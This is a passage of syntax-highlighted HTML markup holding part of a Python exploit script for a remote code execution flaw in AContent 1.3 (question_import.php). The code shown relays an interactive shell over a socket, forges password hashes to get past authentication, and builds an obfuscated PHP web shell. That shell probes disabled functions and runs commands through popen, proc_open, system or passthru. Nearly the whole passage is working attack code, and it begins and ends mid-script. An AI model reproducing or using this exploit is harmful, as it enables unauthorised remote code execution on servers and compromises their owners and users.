class=\"crayon-v\">select<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">select<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fileno<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fileno<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;exit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;quit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">terminate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">KeyboardInterrupt<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">finally<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tcsetattr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TCSADRAIN<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">old_settings<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-43\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">terminate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">shutdown<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-48\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">threaded_tcp_server<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ThreadingMixIn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TCPServer<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-51\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">banner<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nt| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; |&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;t| AContent &lt;= 1.3 question_import.php Remote Code Execution Vulnerability |&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-55\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_get_hashed_password<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-57\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;takes advantage of the authentication weakness and generates <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-58\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;the hash as the server expects it, see client side code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-59\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sha1<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sha1<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">hash_stage_1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s%s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hash_stage_1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-66\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-67\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_build_php_code<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-70\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;@set_time_limit(0); @ignore_user_abort(1); @ini_set(&#8216;max_execution_time&#8217;,0);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$dis=@ini_get(&#8216;disable_functions&#8217;);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(!empty($dis)){$dis=preg_replace(&#8216;\/[, ]+\/&#8217;, &#8216;,&#8217;, $dis);$dis=explode(&#8216;,&#8217;, $dis);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$dis=array_map(&#8216;trim&#8217;, $dis);}else{$dis=array();} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(!function_exists(&#8216;LcNIcoB&#8217;)){function LcNIcoB($c){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;global $dis;if (FALSE !== strpos(strtolower(PHP_OS), &#8216;win&#8217; )) {$c=$c.&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-i\">n<\/span><span class=\"crayon-s\">&#8220;;} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$imARhD=&#8217;is_callable&#8217;;$kqqI=&#8217;in_array&#8217;;&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if($imARhD(&#8216;popen&#8217;)and!$kqqI(&#8216;popen&#8217;,$dis)){$fp=popen($c,&#8217;r&#8217;);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=NULL;if(is_resource($fp)){while(!feof($fp)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o.=fread($fp,1024);}}@pclose($fp);}else&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if($imARhD(&#8216;proc_open&#8217;)and!$kqqI(&#8216;proc_open&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$handle=proc_open($c,array(array(pipe,&#8217;r&#8217;),array(pipe,&#8217;w&#8217;),array(pipe,&#8217;w&#8217;)),$pipes); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@proc_close($handle);}else if($imARhD(&#8216;system&#8217;)and!$kqqI(&#8216;system&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;ob_start();system($c);$o=ob_get_contents();ob_end_clean(); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}else if($imARhD(&#8216;passthru&#8217;)and!$kqqI(&#8216;passthru&#8217;,$dis)){ob_start();passthru($c); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=ob_get_contents();ob_end_clean(); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span 